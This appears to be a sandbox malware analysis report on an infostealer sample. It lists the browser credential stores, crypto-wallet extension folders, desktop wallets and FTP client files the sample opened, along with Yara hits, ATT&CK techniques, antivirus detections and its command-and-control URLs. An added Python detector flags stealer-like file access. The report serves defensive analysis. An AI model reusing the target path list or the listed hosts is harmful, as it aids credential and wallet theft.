                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
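The file-open list above is the access pattern a stealer leaves in a file-access log: one process, in one run, opens the Chrome "Login Data" store, the Firefox logins.json and key4.db pair, a burst of Chrome "Local Extension Settings" directories (keyed by the 32-character a-p extension ID that wallet extensions such as MetaMask use), desktop wallet directories and FTP client favourites. The Python below is an added example and not part of the Joe Sandbox report: it parses lines in the report's "Source: ... File opened: ..." form, maps each path to a data category and flags a process that touches several categories. The category table, its regexes and the three-category threshold are assumptions; the log lines are constructed from paths in the report, plus one benign chrome.exe line opening its own Login Data to show why a single category is not enough.

```python
"""Flag stealer-like file access from a sandbox behaviour log.

Added example, not part of the Joe Sandbox report. The log lines are
constructed from paths listed in the report (plus one benign chrome.exe line);
the category table, its regexes and the three-category threshold are the
author's assumptions.
"""
import re
from collections import defaultdict

# One regex list per kind of sensitive local data. Chrome extension storage is
# keyed by the 32-character a-p extension ID, so wallet extensions show up as
# a burst of "Local Extension Settings\<id>" opens.
CATEGORIES = {
    "browser_credentials": [
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\logins\.json$",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\key4\.db$",
    ],
    "browser_history": [r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$"],
    "browser_extension_storage": [r"\\Local Extension Settings\\[a-p]{32}$"],
    "desktop_wallet": [
        r"\\Exodus\\", r"\\Ledger Live$", r"\\atomic\\", r"\\Coinomi\\",
        r"\\Bitcoin\\", r"\\Binance$", r"\\com\.liberty\.jaxx\\",
        r"\\Electrum(-LTC)?\\", r"\\Guarda\\",
    ],
    "ftp_client": [r"\\SmartFTP\\", r"\\3D-FTP$"],
}

# Report line format: "Source: <process>  File opened: <path>"
LINE_RE = re.compile(r"^Source: (?P<proc>.+?)\s+File opened: (?P<path>.+)$")

# Constructed sample: paths copied from the report plus one benign chrome.exe line.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe  Directory queried: C:\Users\user\Documents
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
""".strip().splitlines()


def parse_events(lines):
    """(process, path) pairs for every 'File opened' line; other lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m.group("proc"), m.group("path").rstrip()))
    return events


def categorize(path):
    """Category name for a path, or None when it is not a known target."""
    for name, patterns in CATEGORIES.items():
        if any(re.search(p, path, re.IGNORECASE) for p in patterns):
            return name
    return None


def score(events, threshold=3):
    """Per process: touched categories, number of distinct target paths, verdict.

    A browser legitimately opens its own credential store (one category); a
    stealer sweeps several unrelated categories in one run.
    """
    touched = defaultdict(lambda: defaultdict(set))
    for proc, path in events:
        cat = categorize(path)
        if cat:
            touched[proc][cat].add(path)
    return {
        proc: {
            "categories": sorted(cats),
            "paths": sum(len(p) for p in cats.values()),
            "stealer_like": len(cats) >= threshold,
        }
        for proc, cats in touched.items()
    }


def analyze(lines=SAMPLE_LOG):
    return score(parse_events(lines))


if __name__ == "__main__":
    for proc, verdict in analyze().items():
        print(proc, verdict)
```

On the sample, AaEBZ7icLd.exe touches all five categories across eight distinct paths and is flagged, while chrome.exe opening its own Login Data stays at one category. The same scoring can be run over EDR file-access telemetry by swapping the line regex for the product's field names.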
Source: Yara match  File source: 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2279704777.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: AaEBZ7icLd.exe PID: 5632, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match  File source: Process Memory Space: AaEBZ7icLd.exe PID: 5632, type: MEMORYSTR
Source: Yara match  File source: sslproxydump.pcap, type: PCAP
Source: Yara match  File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (listed by tactic; the number in parentheses is the badge the report shows next to a matched technique, techniques without a number are the unmatched cells of the matrix template)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System (41); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detection for the submitted sample (Source / Detection / Scanner / Label):
AaEBZ7icLd.exe  57%   Virustotal
AaEBZ7icLd.exe  58%   ReversingLabs   Win32.Trojan.Generic
AaEBZ7icLd.exe  100%  Avira           TR/Crypt.XPACK.Gen
AaEBZ7icLd.exe  100%  Joe Sandbox ML
No Antivirus matches in the three remaining detection tables.
Antivirus detection for URLs (Source / Detection / Scanner / Label):
https://mindhandru.buzz:443/apil  100%  Avira URL Cloud  malware
https://mindhandru.buzz/apiwa2C6  100%  Avira URL Cloud  malware
https://mindhandru.buzz/s         100%  Avira URL Cloud  malware
https://mindhandru.buzz/gaBC8     100%  Avira URL Cloud  malware
http://crl.microsoft&             0%    Avira URL Cloud  safe
https://mindhandru.buzz/ms        100%  Avira URL Cloud  malware
https://mindhandru.buzz/piP       100%  Avira URL Cloud  malware
https://mindhandru.buzz/P         100%  Avira URL Cloud  malware
https://mindhandru.buzz/Y         100%  Avira URL Cloud  malware
Name / IP / Active / Malicious / Antivirus Detection / Reputation:
mindhandru.buzz  172.67.165.185  Active: true  Malicious: false  Reputation: high

Name / Malicious / Antivirus Detection / Reputation:
scentniej.buzz               Malicious: false  Reputation: high
rebuildeso.buzz              Malicious: false  Reputation: high
appliacnesot.buzz            Malicious: false  Reputation: high
screwamusresz.buzz           Malicious: false  Reputation: high
cashfuzysao.buzz             Malicious: false  Reputation: high
inherineau.buzz              Malicious: false  Reputation: high
prisonyfork.buzz             Malicious: false  Reputation: high
hummskitnj.buzz              Malicious: false  Reputation: high
mindhandru.buzz              Malicious: false  Reputation: high
https://mindhandru.buzz/api  Malicious: false  Reputation: high
Name / Source / Malicious / Antivirus Detection / Reputation (an antivirus detection is given only where the report lists one):

https://duckduckgo.com/chrome_newtab
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz:443/apil
  Source: AaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001063000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://duckduckgo.com/ac/?q=
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://www.google.com/images/branding/product/ico/googleg_lodp.ico
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

http://crl.microsoft
  Source: AaEBZ7icLd.exe, 00000000.00000003.2279767060.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301994724.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz/ms
  Source: AaEBZ7icLd.exe, 00000000.00000003.2301854330.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://mindhandru.buzz/s
  Source: AaEBZ7icLd.exe, 00000000.00000003.2301854330.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://mindhandru.buzz/apiwa2C6
  Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://mindhandru.buzz/gaBC8
  Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz/
  Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275772729.00000000010FE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

http://crl.rootca1.amazontrust.com/rootca1.crl0
  Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

http://ocsp.rootca1.amazontrust.com0:
  Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz/pi
  Source: AaEBZ7icLd.exe, 00000000.00000002.2353089442.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275750558.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2249900831.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276125542.00000000010F2000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz/piP
  Source: AaEBZ7icLd.exe, 00000000.00000003.2275750558.00000000010F1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://www.ecosia.org/newtab/
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
  Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz:443/api
